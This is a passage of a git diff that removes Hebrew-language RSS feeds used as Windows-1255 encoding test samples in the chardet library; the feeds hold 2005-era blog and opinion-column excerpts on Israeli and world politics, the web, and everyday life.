אויר בריאותיו; פַּפַּנדריאו של יוון הנהיג את ארצו עם מים בריאותיו ודיאליזה בכִלְיוֹתָיו; ילצין של רוסיה כמעט מת בין הסיבוב הראשון לסיבוב השני – אבל ניצח; פֶּרוֹן של ארגנטינה היה פוחלץ, נבחר ברוב עצום, מת כמעט מייד -- והשאיר את השלטון לאשתו. גם כשאין בריאות, יש כריזמה, וזה הרבה יותר חשוב</div>2005-12-23T10:22:00+02:00רק לא אוגוסטוסhttp://www.notes.co.il/karny/15090.asp<div dir="rtl" style="width:100%">האם אריאל שרון התעייף כל כך מִמוּמֵי המערכת הפוליטית הישראלית, שהוא רוצה לעשות מעשה אוגוסטוס קיסר? להחריב את הרפובליקה כדי להציל את רומא? זו ברירה מסולפת. הוא צריך ליילד רפובליקה של שלום</div>2005-12-10T07:31:00+02:00המפקדת העליונה אינה רוצה להיות שַליטת היְקוּםhttp://www.notes.co.il/karny/14912.asp<div dir="rtl" style="width:100%">אשה בכהונה בכירה? לא חדשות, אמרה עורכת אמריקנית לפני 12 שנה. אבל בכל זאת חדשות: בעמק הסיליקון, בלשכת הקנצלר בברלין, אולי גם בלשכה הסגלגלה. בינתיים אמריקנים עושים חזרה כללית: ג'ינה דייוויס היא הנשיאה, אחת לשבוע</div>2005-12-02T06:46:00+02:00"סופת הוריקאן פוליטית בגודל של קתרינה"http://www.notes.co.il/karny/14890.asp<div dir="rtl" style="width:100%">זה מה שאומרים עכשיו על שערוריית השחיתות המתרחבת והולכת, המסתבכת והולכת, בוושינגטון. עכשיו יש לתביעה עֵד מלך, והוא "האיש המסוכן ביותר בעיר" מפני שבגילוייו תלוי גורלם של עשרות חברי קונגרס. כתב אישום לא רק נגד יחידים, כי אם נגד השיטה הפוליטית כולה</div>2005-11-30T08:38:00+02:00אז מה חייל, איך הבחורות בחברון?http://www.notes.co.il/karny/14826.asp<div dir="rtl" style="width:100%"><P style="DIRECTION: ltr; TEXT-ALIGN: left" align=right>&nbsp;</P> -<DIV class=imgDiv style="WIDTH: 490px"><IMG class=imgbox src="http://www.notes.co.il/karny/user/hebron.jpg"><BR> -<P class=MsoNormal dir=rtl style="MARGIN: 0in 0in 0pt; DIRECTION: rtl; unicode-bidi: embed; TEXT-ALIGN: center" align=center><SPAN lang=HE style="FONT-SIZE: 8pt; FONT-...</div>2005-11-26T08:46:00+02:00פטריוטים, מנוּוָלים וסתם פוליטיקאיםhttp://www.notes.co.il/karny/14824.asp<div dir="rtl" style="width:100%">גַבּוֹ אל הקיר, התמיכה בו גלשה אל שפל היסטורי. מה ג'ורג' בוש עושה? מה שאבא עשה לפני 17 ה: מתעטף בדגל הלאומי -- וּמעמיד בספק את הפטריוטיות של מבקריו</div>2005-11-26T03:05:00+02:00לעזאזל המפלגה, העיקר הנֶצַחhttp://www.notes.co.il/karny/14779.asp<div dir="rtl" style="width:100%">אמרו כמה וכמה מנהיגים פוליטיים בעולם במאה השנה האחרונות. לאחר קריירה ארוכה הם גילו פתאום שמפלגותיהם מזיקות לשלום האומה – וניסו להרוס אותן. אחוז ההצלחה, כפי שמראים הסיפורים הבאים, לא היה גבוה. אבל כל המנהיגים האלה היו "גדולים מן החיים", האמינו שהוטלה עליהם משימה לאומית, והעדיפו לשלוט – או לצאת בטריקת דלת רועמת</div>2005-11-23T06:39:00+02:00לולה של ברזיל: מן המחרטה אל הנשיאותhttp://www.notes.co.il/karny/14658.asp<div dir="rtl" style="width:100%">הוא לא טעם לחם עד גיל שבע, הוא נשר מבית ספר אחרי חמש כיתות כדי לעזור בפרנסת משפחתו, הוא נעשה פועל מתכת בגיל 14, אירגן פועלים, לחם במשטר הצבאי, ישב בבית הסוהר, יסד מפלגה, הובס שלוש פעמים – עד שבא תורו. "אלוהים שלח אותך לעזור לעניים", הזכיר לו שלט בשכונת עוני, "עכשיו, קיים-נא את הבטחותיך"</div>2005-11-17T09:37:00+02:00לֶך ואלֶנסה: "שמי הוא 'הנשיא'"http://www.notes.co.il/karny/14657.asp<div dir="rtl" style="width:100%">מנהיג פועלים אותנטי יותר קשה להעלות על הדעת. לך ואלנסה נולד בפרובינציה נידחת, גדל בעוני, למד להאמין שהכול "שחור או לבן", עבד במִספָּנָה, אִרגֵן עובדים, קרא תיגָר על ממשלה, ישב בכלא, האמין באלוהים וּבִבנוֹ, ועזר להוציא את עמו מֵעַבדוּת לחֵרוּת. ואז הוא רצה שלטון. ואז הוא קיבל אותו. ואז התברר מיהו באמת</div>2005-11-17T09:36:00+02:00פועלים, פועלים ואין פועליםhttp://www.notes.co.il/karny/14655.asp<div dir="rtl" style="width:100%">עשרות מפלגות בכל העולם כללו "פועלים" ו"עבודה" בשמן. אבל הן העדיפו להעמיד פילוסופים ועורכי דין בראשן. עמיר פרץ יגלה שהביוגרפיה שלו נדירה למדי. כמה הערות היסטוריות -- ודיוקנאות קצרים של שני פועלים שהיו לראשי מדינות: לך ואלנסה מפולין (גיבור המאבק שזוהרו הוּעַם בשלטון), ו'לוּלַה' דא סילווה מברזיל (שהלהט המהפכני שלו הצטנן לטובה בארמון הנשיאות) - -</div>2005-11-17T09:37:00+02:00קולורדו קופצת מהר התבורhttp://www.notes.co.il/karny/14653.asp<div dir="rtl" style="width:100%">"מגילת זכויות משַלֵם המסים", או בקיצור 'תבור', נולדה במדינת קולורדו לפני 13 שנה. בשעתה היא נחשבה ציון דרך היסטורי בהתפתחותו של מרד משלמי המסים. היא נועדה להבטיח שהממשלה לא תוכל עוד לגדול. בשבוע שעבר, קולורדו שינתה את דעתה – והראתה אולי כיווּן חדש של נשיבת הרוח באמריקה כולה</div>2005-11-17T06:31:00+02:00מה אומר הקוסם מטוקיו? מה אומר המכשף מברלין? הם אומרים: אפשר להפנט את הבוחר (או לפחות אפשר לנסות) http://www.notes.co.il/karny/13638.asp<div dir="rtl" style="width:100%">ראש ממשלת יפאן נחל השבוע נצחון מרעיש בבחירות לפרלמנט, שני שלישים של המושבים. איך הוא עשה את זה, לכל הרוחות? איך הוא שיכנע את הבוחר שמפלגה זקנה וּמאוּבּנת, המחזיקה בשלטון כבר 50 שנה, היא נוֹשֵׂאת הנֵס של רפורמות כלכליות נועזות? הקנצלר של גרמניה מנסה לשלוף ארנב דומה מן המגבעת בבחירות של יום א'. זה שיעור שכל מנהיג ירצה ללמוד, גם אריאל שרון</div>2005-09-17T17:44:00+02:00קללת באנדונגhttp://www.notes.co.il/karny/13625.asp<div dir="rtl" style="width:100%">בדיוק לפני 50 שנה נטרקה הדלת, וישראל נודתה מן העורף הטבעי שלה: אסיה. עזה ופקיסטן פותחות עכשיו סדק בדלת. פתאום יש סיכוי שמלחמת ישראל נגד הגיאוגרפיה תגיע אל קיצה. האם זה שווה את מעלה אדומים? זה שווה לפחות מחשבה </div>2005-09-16T22:54:00+02:00למי שרקה קתרינה?http://www.notes.co.il/karny/13510.asp<div dir="rtl" style="width:100%">היתכן שטביעתה של ניו אורלינס היא צומת דרכים בהיסטוריה הפוליטית של ארה"ב? בוודאי מוקדם להגיד, אבל אולי לא מוקדם להתחיל לנחש. תשע שנים לאחר שהימין האמריקני חגג את מות ההנחה ש"רווחה היא אחריות ציבורית", ונשיא דמוקרטי הודה ש"עידן 'הממשלה הגדולה' הסתיים", אמריקה חיפשה בשבוע שעבר עד ייאוש את הממשלה, גדולה או קטנה. אולי מתחיל עכשיו חשבון נפש על רפורמות כ...</div>2005-09-10T20:47:00+02:00פורש בן פורשhttp://www.notes.co.il/karny/13051.asp<div dir="rtl" style="width:100%">הוא אמר "אבא", בנאום ההתפטרות שלו, וממילא אין לו סיבה להתלונן על שִגיוֹן הפסיכונאליזה שלהלן. אם בנימין נתניהו הוא "בנו של היסטוריון", אז צריך לעיין קצת בהיסטוריה של ההיסטוריון. בייחוד צריך לשקול את הצורך הכפייתי של האגף הרדיקלי במחנה הלאומי לפרוש. פעם אחר פעם, כולל הקיץ הזה לפני שבעים שנה, הם שברו את הכלים, כדי שלא יוחזקו אחראים; הם קפצו מן העגלה,...</div>2005-08-18T04:57:00+02:00האדריכל – או קבלן ההריסותhttp://www.notes.co.il/karny/12384.asp<div dir="rtl" style="width:100%">ענני סוּפָה בוושינגטון: קארל רוֹב מתואר לעתים קרובות כמי שהמציא את הקריירה הפוליטית של ג'ורג' בוש. אומרים עליו שהוא "הנשיא המשותף", "האסטרטג הראשי", "המוח של בוש". הוא בוודאי יועצו הקרוב ורב ההשפעה ביותר של נשיא ארה"ב. הוא חשוד עכשיו במפורש שעבר על החוק, כאשר הדליף שם של קצינת סי.איי.אי. אם יעמוד לדין, ובוודאי אם יורשע, המימשל כולו עשוי לשלם את המ...</div>2005-07-14T08:14:00+02:00 diff --git a/chardet/tests/windows-1255-hebrew/notes.co.il.7.xml b/chardet/tests/windows-1255-hebrew/notes.co.il.7.xml deleted file mode 100644 index 3cb1de6..0000000 --- a/chardet/tests/windows-1255-hebrew/notes.co.il.7.xml +++ /dev/null @@ -1,46 +0,0 @@ - - -heאלוהים נמצא בפרטים הקטניםhttp://www.notes.co.il/eyalבין שיחות השלום לבין ההרהורים על מהות קיומנו ביקום - יש מאלאנ'תלפים דברים קטנים קטנים, שעושים את ההבדל...איל שחראיל שחרWeb 2.0 או איך להרגיש טיפש בחצי דקה...http://www.notes.co.il/eyal/13991.asp<div dir="rtl" style="width:100%">מי שחבר טוב של האינטרנט לא יכול שלא להיתקל במונח Web 2.0 כמה פעמים ביום בהקשרים שונים. -אולי אני לבד כאן, אבל אין כאן תחושה כאילו כולם משתפים איזה סוד ואף אחד לא סיפר לי?</div>2005-10-11T01:08:00+02:00לאסוף כסף מהרצפהhttp://www.notes.co.il/eyal/13309.asp<div dir="rtl" style="width:100%">התחום שבו אנחנו מוציאים את החלק הגדול ביותר של המשכורת שלנו - לא מטופל בצד ה-e-commerce כמו שצריך, גם בשנת 2005. אני מחפש למי להעביר את הכסף שלי, ולא נראה שאף אחד מהם ממש רוצה אותו... </div>2005-08-30T00:58:00+02:00זו לא האיכות, זו הכמותhttp://www.notes.co.il/eyal/12762.asp<div dir="rtl" style="width:100%">איך למצוא את מה שחיפשת, מבלי להסתכל על התוצאות בכלל? פשוט מאד - הולכים עם העדר.</div>2005-08-03T00:35:00+02:00בלי ידיים!http://www.notes.co.il/eyal/11913.asp<div dir="rtl" style="width:100%"><P><STRONG>&nbsp;</P> -<DIV class=imgDivLeft><IMG class=imgboxoff src="http://www.notes.co.il/eyal/user/noHands.gif"></DIV> -<P>אזהרה: ציורי למדי...</STRONG></P> -<P>&nbsp;</P> -<P>מצאתי את השלט המואר לשירותים, נכנסתי דרך הדלת האוטומטית*, נעמדתי מול הקיר. רגע... רגע... רגע... סיימתי. עזבתי את הקיר שישטוף את עצמו, נטלתי ידייים, ייבשתי ידיים, וחזרתי...</div>2005-06-16T23:15:00+02:00בעוד עשרים שנהhttp://www.notes.co.il/eyal/11912.asp<div dir="rtl" style="width:100%"><P>בעוד 20 שנה, נדע לספר איך אנשים במדים פשפשו לנו בתיקים מספר פעמים ביום, וערכו עלינו חיפוש גופני. ואיך בכניסה לחניונים נתבקשנו להצהיר מאיפה אנחנו באים, ולו כדי לבחון את המוצא שלנו.</P> -<P>מעניין איך זה יישמע...</P></div>2005-06-16T22:24:00+02:00איך אומרים "גימטריה" בעברית?http://www.notes.co.il/eyal/11441.asp<div dir="rtl" style="width:100%"><P>אל תשאלו למה, אבל ניסיתי למצוא אם יש מילה עברית תקנית למונח הלועזי "גימטריה".</P> -<P>פתאום נפל לי האסימון - זה מונח של העם העברי בלבד!</P> -<P>רק אנחנו למדנו בכיתה <STRONG>י"א</STRONG> על מאורעות <STRONG>תרפ"ט</STRONG>. רק אנחנו גרים ברח' <STRONG>כ"ג </STRONG>יורדי הסירה פינת ה<STRONG>ל"ה</STRONG>. רק אנחנו חוגגים את <STRONG>ט"ו</STRONG> בשבט....</div>2005-05-20T17:59:00+02:00Google פרסונלי - כמה מאכזב...http://www.notes.co.il/eyal/11439.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<DIV class=imgDivLeft><IMG class=imgboxoff src="http://www.notes.co.il/eyal/user/google_sleeping.gif"></DIV> -<P>Google הכריזו על "העמוד הפרסונלי" שלהם <A href="http://www.google.com/ig">http://www.google.com/ig</A>.</P> -<P>&nbsp;</P> -<P>מבחינתי זה הדבר הכי מאכזב ש-Google יכלו לעשות, כי:</P> -<P>&nbsp;</P> -<OL> -<LI>עם כל הכבוד ל...</div>2005-05-20T10:59:00+02:00סליחה? לא הקשבתי... (או "לישון עם הבריזה")http://www.notes.co.il/eyal/11321.asp<div dir="rtl" style="width:100%">יש מערכון שנקרא "איך הורסים בדיחה", המתבסס על בדיחה של דן בן אמוץ. אחת הדרכים להרוס בדיחה, לפי המערכון הזה, היא לשאול: "מכיר את הבדיחה על ירצו יאכלו לא ירצו אל יאכלו?" -לכל סיפור יש התחלה, אמצע וסוף. ומה אם הם לא בסדר הנכון? אה - זה כבר סיפור אחר.</div>2005-05-14T11:01:00+02:00חניך תורן, תן לנו זמנים!http://www.notes.co.il/eyal/10560.asp<div dir="rtl" style="width:100%"><DIV class=imgDivLeft><IMG class=imgboxoff src="http://www.notes.co.il/eyal/user/simpleclock.jpg"></DIV> -<P>בכל פעם שמגיע הזמן לעבור לשעון חילונים, או להיפך, אני נדהם מחדש לגלות כמה שעונים מקיפים אותי:</P> -<UL> -<LI>על היד -<LI>במחשב -<LI>במחשב של אשתי -<LI>במחשב בעבודה -<LI>באוטו -<LI>ברדיו של האוטו -<LI>בוידאו -<LI>על הקיר -<LI>בטלפון ...</div>2005-04-01T10:29:00+02:00האמת המזעזעת!http://www.notes.co.il/eyal/10497.asp<div dir="rtl" style="width:100%"><P>אז מכרו לאמנון לוי בשר לא טרי במכולת.</P> -<P>שידווח למשרד הבריאות וילך לקנות במקום אחר.</P> -<P>למה הפרומואים הגרנדיוזיים האלו? </P> -<P>"ה-א-מ-ת ה-מ-ז-ע-ז-ת-!". נו באמת. נגמר מה להגיד?</P></div>2005-03-28T23:31:00+02:00פיליפינית מבולגריהhttp://www.notes.co.il/eyal/9936.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<DIV class=imgDivLeft><IMG class=imgboxoff src="http://www.notes.co.il/eyal/user/philipinns.jpg"></DIV> -<P>המודעה שבתמונה מציעה פיליפינים מכל העולם. זו שבתמונה, למשל, רומזת לנו שהיא אישית מבולגריה.</P> -<P>אפשר לקבל איזה פיליפיני שרוצים? יש נוטריון פיליפיני? פשוט אלו שכאן בארץ רוצים המון כסף על כל חתימה מסכנה. זה בטח יוצא יותר זול....</div>2005-02-26T10:02:00+02:00אומץ, באומן! אומץ!http://www.notes.co.il/eyal/9935.asp<div dir="rtl" style="width:100%"><P>באומן-בר-ריבנאי <A href="http://www.ynet.co.il/articles/0,7340,L-3023882,00.html" target=_blank>העלו 436 גרסאות</A> שונות בקמפיין של מותג פלאפון החדש. הערך הראשי מאחורי ההמותג החדש היה "פשטות". בלי שום דבר מיותר. הכל ישיר ונקי.</P> -<P>ופתאום - מישהו איבד את האומץ. היה לו ריק מדי, והוא החליט להיסחף לקלישאה עיצובית שמתאימה לפלאיירים:</P> -<DIV c...</div>2005-02-19T22:53:00+02:00איזה עיתון קנית היום? את העדכני?http://www.notes.co.il/eyal/9399.asp<div dir="rtl" style="width:100%"><DIV class=imgDivLeft><IMG class=imgboxoff src="http://www.notes.co.il/eyal/user/yediot02.jpg"></DIV> -<P>צוות העריכה של ידיעות אחרונות למד מצוות Ynet טריק מעניין: עיתון שמתעדכן!</P> -<P>הנה מה שמצאתי בדוכן העיתונים הבוקר: גרסת הלילה המיושנת, וממש לידה גרסת הבוקר העדכנית של אותו עיתון.</P> -<P>לעומתם, צוות העריכה של מעריב למד מהפוליטיקאים לא להתחי...</div>2005-01-14T13:35:00+02:00מבחן כתמי הדיו של רורשאך - בממשק!http://www.notes.co.il/eyal/9393.asp<div dir="rtl" style="width:100%">Register.com החליטו להעמיד את משתמשי האתר שלהם במבחני ראיה ודמיון. ממש מבחן כתמי הדיו של רורשאך. לא הצלחת? - לא תוכל להשתמש באתר.</div>2005-01-13T23:48:00+02:00דמוקרטיה - הישמריhttp://www.notes.co.il/eyal/9259.asp<div dir="rtl" style="width:100%"><P>אתמול בבוקר, נעצרו 4 אזרחים ישראליים בגלל האתרים בהם החליטו לבקר ולהוריד תכנים. כן, כן. האח הגדול הגזים בגדול.</P> -<P>כדי שלא יגידו שאני מעוות את המציאות - מדובר בגברים שהורידו תכני פדופיליה. בתור אב טרי לילד הכי מקסים בעולם, אני גם מרשה לעצמי להגיד שהייתי מבין כל&nbsp;מי שירצח בעינויים את הפדופיל שנגע בבן/בת שלו. ואני גם מוכן להודות שאין לי ב...</div>2005-01-04T22:26:00+02:00בשערות של התחת של עצמנוhttp://www.notes.co.il/eyal/9212.asp<div dir="rtl" style="width:100%">העולם מתהפך. מספר ההרוגים גדל בקצב של עשרות אלפים ליום. המספרים בלתי ניתנים לעיכול. התמונות נוראיות. הסיפורים מזעזעים. העולם משבית את מסיבות הסילבסטר לזכר הטובעים והנעדרים ומשפחותיהם. ואנחנו? חוזרים לחלוקה של "אנחנו" ו"כל השאר". תמיד מעניין אותנו בשורה התחתונה - כמה ישראלים? -</div>2005-01-01T20:01:00+02:00דברים שהיו צריכים להשתנות מ-ז-מ-ן-!http://www.notes.co.il/eyal/9114.asp<div dir="rtl" style="width:100%">יש כמה ממשקים שתצורתם נקבעה מזמן, אך משום מה הם נשתמרו עד היום עם כל הבעיות שלהם. למה? כוחו של הרגל, אולי.</div>2004-12-26T23:57:00+02:00כולם רוצים להיות גוגלhttp://www.notes.co.il/eyal/8851.asp<div dir="rtl" style="width:100%">על כמה שגוגל הם מלכי האינטרנט - אין מה לדבר. אבל זה שהם הכתיבו לכל העולם איך צריך להיראות מנוע חיפוש, עד שמעתיקים מהם גם טעויות - זה כבר השיא.</div>2004-12-09T23:27:00+02:00משאירים את החנויות ריקות ?http://www.notes.co.il/eyal/8325.asp<div dir="rtl" style="width:100%">או שהמפרסם מנותק לחלוטין מהמציאות, או שהוא משוכנע שאנחנו כאלה. זה משאיר אותי קצת מבולבל - לזלזל או להיעלב?</div>2004-11-11T00:42:00+02:00 diff --git a/chardet/tests/windows-1255-hebrew/notes.co.il.8.xml b/chardet/tests/windows-1255-hebrew/notes.co.il.8.xml deleted file mode 100644 index 513e4f7..0000000 --- a/chardet/tests/windows-1255-hebrew/notes.co.il.8.xml +++ /dev/null @@ -1,55 +0,0 @@ - - -heכותבת מוחקתhttp://www.notes.co.il/avivaהיום זה היום לקטוף את הפרח שאיש לא נתן עליו דעתואביבה משמריאביבה משמריבעדינות (ומתחת למים)http://www.notes.co.il/aviva/15560.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<P>על <A href="http://news.walla.co.il/?w=//833069" target=_blank>חתונת האשה והדולפין</A> בטח שמעתם כבר (שיהיה במזל, חבר'ה). </P> -<P>טוב, אז השלב הבא הוא&nbsp;<A href="http://www.sexwork.com/family/dolphins1.html" target=_blank>הלינק הזה</A>,&nbsp;שתמיד מרענן&nbsp;לקשר אליו. <BR>לא מומלץ לדלג על שלב Q1.</P></div>2005-12-29T19:54:00+02:00וירוס רוטה http://www.notes.co.il/aviva/15524.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<P>פיצי נפגש עם מיצי, משחקים. פיצי מקיא.</P> -<P>מיצי נדבק. מקיא. </P> -<P>מיצי מבריא, נפגש עם פריצי, משחקים. </P> -<P>פריצי נדבק. מקיא. </P> -<P>פריצי מבריא, נפגש עם שמיצי, משחקים.</P> -<P>שמיצי נדבק. מקיא.</P> -<P>שמיצי מבריא, נפגש עם גיצי, משחקים. </P> -<P>גיצי נדבק. מקיא. </P> -<P>אמא של גיצי כועסת על אמא של שמיצי. ככה עושים?</P...</div>2005-12-28T09:28:00+02:00מי רוצה להיות שרון חזיזhttp://www.notes.co.il/aviva/15276.asp<div dir="rtl" style="width:100%">שיגעו אותנו עם המודעות שלהם. שמישהו כבר יגיד לנו איך אפשר לנסות למנוע סרטן שד</div>2005-12-15T20:58:00+02:00WTFhttp://www.notes.co.il/aviva/15204.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<P>מה זה <A href="http://www.enoshut.com/" target=_blank>זה</A>, ולמה זה הגיע אלי כדואר זבל דרך <A href="http://mednet.co.il/" target=_blank>רשת רפואה</A>&nbsp;דווקא? הם יודעים מה שולחים בשמם? </P> -<P>(הייתי בטוחה שמדובר בעוד סיינטולוגיה במסווה, עד <A href="http://www.enoshut.com/more.html" target=_blank>שהגעתי לקטע</A> על מפעלי ים...</div>2005-12-13T20:59:00+02:00יתרת חובהhttp://www.notes.co.il/aviva/15107.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<P>"לכל אחד יש מחויבות <STRONG>למשהו</STRONG>. המחויבויות שלנו הן מה שהופך אותנו למה שאנחנו".<EM> </EM></P> -<P>(יאיר לפיד, מדקלם קופי בפרסומת לבנק קטן. ציטוט חופשי). </P> -<P>הופה. מה זה הדבר הזה.</P> -<P>כשאומרים "מחויבויות", חושבים על משפחה/עבודה/משכנתא (לפעמים בסדר הזה ולפעמים לא), אחר כך אולי גם&nbsp;על מחויבות רומנטית או&nbsp;...</div>2005-12-10T20:00:00+02:00חידונאי ותיקhttp://www.notes.co.il/aviva/15054.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<P>קפד זנבו: סרט מוזיקלי מדליק; קפד זנבו: דמות מספר ילדים עתיק. </P> -<P><A href="http://www.haaretz.co.il/hasite/pages/ShArtPE.jhtml?itemNo=654906&amp;contrassID=2&amp;subContrassID=13&amp;sbSubContrassID=0" target=_blank>שמוליק רוזן בן 80</A> (וצריך לקרוא חצי טקסט של נרי ליבנה בשביל להגיע לחלק שלו). </P></div>2005-12-08T21:44:00+02:00בעיר שנראית כמו כל עירhttp://www.notes.co.il/aviva/14953.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<P>טרי-טרי מהלילה: </P> -<P>אני ברחוב רחב, ראשי, בעת לילה מאוחרת, בעיר שנראית כמו כל עיר. רואה זוג שנשדד (או כויס?)&nbsp;בידי בחור שחור עם מעיל זמש חום. הנשדדים מבינים מה קרה, חוברים לשודד ומתיידדים איתו. אני מספרת על זה לצד שלישי:</P> -<P>"הם קודם הלכו ובאו, ניסו לברר מה קרה, ואחר כך פשוט התחילו לדבר עם השודד, התחילו ללכת לכיוון של...</div>2005-12-04T07:24:00+02:00סערה במשאבהhttp://www.notes.co.il/aviva/14874.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<P>ניחוש אחד: אתם לא עוקבים אחרי פורום הנקה של ווי-נט. גם אני לא, האמת. אבל בימים האחרונים התרחשה שם דרמה מעניינת. </P> -<P>חברת תמ"ל (תרכובת מזון לתינוקות) שילמה על מודעה למוצר שלה, שהוצבה בראש הפורום. המנהלות (חברות <A href="http://www.lllisrael.org.il/default.asp" target=_blank>לה לצ'ה</A> המחויבות <A href="http://www.lalecheleag...</div>2005-11-29T10:30:00+02:00שני גברים, האחד מביט בעיני השניhttp://www.notes.co.il/aviva/14864.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<P>"אז מה, ככה נראה קטרקט?"</P> -<P>"כן".</P> -<P>"בטוח? בדקו?"</P> -<P>"נו מה". </P> -<P>&nbsp;</P></div>2005-11-28T09:07:00+02:00ביי ביי בייבי, ביי בייhttp://www.notes.co.il/aviva/14730.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<P><A href="http://www.haaretz.co.il/hasite/pages/ShArtPE.jhtml?itemNo=647999&amp;contrassID=2&amp;subContrassID=1&amp;sbSubContrassID=0" target=_blank>הבייבי בוקס</A> - יעיל, כך אומרים,&nbsp;אך שנוי במחלוקת. יש האומרים כי הוא שולל את זכותם הטבעית של תינוקות לדעת מה מוצאם. </P> -<P>עם זאת, יש לזכור שהוא מגן על תינוקות רבים מפני מימו...</div>2005-11-21T09:38:00+02:00נטשה אכלה אותהhttp://www.notes.co.il/aviva/14599.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<P>זוכרים את נטשה "עיני רנטגן" דמקינה, <A href="http://www.notes.co.il/aviva/4502.asp" target=_blank>שכיכבה</A> בבלוג זה לפני שנה בערך? </P> -<P>ובכן,&nbsp;בגלילאו מתפרסמת <A href="http://www.sbc.co.il/FullArti.asp?MagId=17&amp;MagNum=&amp;ArtiId=5396" target=_blank>כתבה ספקנית</A>, הטוענת כי&nbsp;כוחותיה של דמקינה הועמדו למבחן, וכש...</div>2005-11-14T09:58:00+02:00אל: מר ת. ת. מודעhttp://www.notes.co.il/aviva/14554.asp<div dir="rtl" style="width:100%"><P>למרות השם המתחכם, "<A href="http://israblog.nana.co.il/blogread.asp?blog=12136" target=_blank>בטטה קרה</A>" הוא בלוג האקטואליה הקטנוני הכי טוב שאתם לא מכירים. עדיין, עדיין לא מכירים. הוא ממש חדש. </P> -<P>וכבר אנחנו מטביעים אותו בציפיות. נקווה שלא יחטוף משבר הפוסט השלישי. </P> -<P>טוב, עד שיפרסם עוד בואו נחשוב ביחד איך הוא זכה לקבל&nbsp;מספר כז...</div>2005-11-11T19:08:00+02:00תפסיק לפקסס אליhttp://www.notes.co.il/aviva/14552.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<P>הנה <A href="http://www.allmarketing.co.il/Index.asp?ArticleID=1988&amp;CategoryID=59" target=_blank>סקר מעניין</A>&nbsp;שגיליתי בחיפוש אקראי. לא נראה לי מאוד מייצג, אבל הוא מעורר שאלות מעניינות, בעיקר כאלה הנוגעות ליערות הגשם ולקשר שלהם לריבוי פקסים בעולמנו, בדרך כלל כגיבוי לשלוש הודעות דואל ולמעטפה הממתינה בדואר - רשום, כמובן.<...</div>2005-11-11T11:36:00+02:00ערפל על העירhttp://www.notes.co.il/aviva/14539.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<P>שאלה לתל-אביביים משכימי הקום, שראו הבוקר את העשן והריחו את הריח:&nbsp;מי יודע איפה היתה השריפה? </P></div>2005-11-10T12:35:00+02:00ראשי פרקים למאמר שלא אכתובhttp://www.notes.co.il/aviva/14497.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<P>ושמן הסתם (לא) יפורסם ב"אייל הקורא":</P> -<P>&nbsp;</P> -<P>"בגלות בתל-אביב" - על העיר העברית כסניף של השטעייטעל, על התל-אביבי כטיפוס גלותי</P> -<P>&nbsp;</P> -<P>1. נקודת המוצא היא "ללכת יומם ולילה" של משה אופיר, על גיבורו החוזר בשאלה שהוא טיפוס "יהודי גלותי" קלאסי. משורר כושל/בינוני. הוא לוזר, כמו רוב הטיפוסים בספר. </P> -<P>2....</div>2005-11-07T21:43:00+02:00נהג מונית בשיחה עם אשתוhttp://www.notes.co.il/aviva/14361.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<P>"ד', יש לה יד מאלוהים. ד' נוגעת בידיים שלה&nbsp;במצית, המצית&nbsp;הופך לזהב".</P></div>2005-10-31T14:34:00+02:00...נרדם, לא נרדם, מה זה משנה http://www.notes.co.il/aviva/14250.asp<div dir="rtl" style="width:100%"><P>מישהו מוכן להסביר לי למה יש פה קוראים שדורשים פוסטים של 500 מילה? </P> -<P>האם פוסטים של חמש או עשר מילים גורמים לכם להרגיש שלא קיבלתם תמורה נאותה לכספכם? </P></div>2005-10-25T22:46:00+02:00שני זוגות הורים, משחקייה בתל-אביבhttp://www.notes.co.il/aviva/14186.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<P>"יש פה מעבר לפינה מסעדה טובה".</P> -<P>"איזה, זאת שפעם שעברה לא נתנו לנו להיכנס?" </P></div>2005-10-21T07:52:00+02:00השתעלו, השתעלו, ובסוףhttp://www.notes.co.il/aviva/14174.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<P>באתר האגודה למלחמה בסרטן הקימו, כלשונם,&nbsp;"<A href="http://www.cancer.org.il/template/default.asp?textSearch=&amp;maincat=3&amp;catid=321" target=_blank>עמוד זיכרון</A> באינטרנט לאנשי ציבור וידוענים שנפטרו ממחלות הקשורות לעישון". </P> -<P>קצת לא נעים לשאול, אבל האם אנשי האגודה מקבלים מידע ישיר מרופאיהם של הידוענים שנפטרו? או ש...</div>2005-10-20T12:47:00+02:00 diff --git a/chardet/tests/windows-1255-hebrew/pcplus.co.il.xml b/chardet/tests/windows-1255-hebrew/pcplus.co.il.xml deleted file mode 100644 index ea5d312..0000000 --- a/chardet/tests/windows-1255-hebrew/pcplus.co.il.xml +++ /dev/null @@ -1,118 +0,0 @@ - - - - - - - - - - - -PCPLUS - -http://www.pcplus.co.il - -המגזין למחשבים ואינטרנט - -he - - - - -רפאל פוגל: מי שמשתמש רק בלינוקס שירים את היד - -http://www.pcplus.co.il/opinions.php?id=148 - - - - - - -רפאל פוגל: סיכום מערכת - -http://www.pcplus.co.il/opinions.php?id=147 - - - - - - -אבי בליזובסקי: כאן זה לא סיציליה - -http://www.pcplus.co.il/opinions.php?id=146 - - - - - - -רפאל פוגל: גוגל, זה טוב ליהודים? - -http://www.pcplus.co.il/opinions.php?id=145 - - - - - - -דן ברומר: GAME OVER - -http://www.pcplus.co.il/opinions.php?id=144 - - - - - - -רפאל פוגל: המטרה: איסמעליה - -http://www.pcplus.co.il/opinions.php?id=143 - - - - - - -אבי בליזובסקי: את הקדמה אי אפשר לעצור - -http://www.pcplus.co.il/opinions.php?id=142 - - - - - - -לובו: ניצחון הטלוויזיה - -http://www.pcplus.co.il/opinions.php?id=141 - - - - - - -יהודה קונפורטס: די לזבל - -http://www.pcplus.co.il/opinions.php?id=140 - - - - - - -רפאל פוגל: מחפשים את 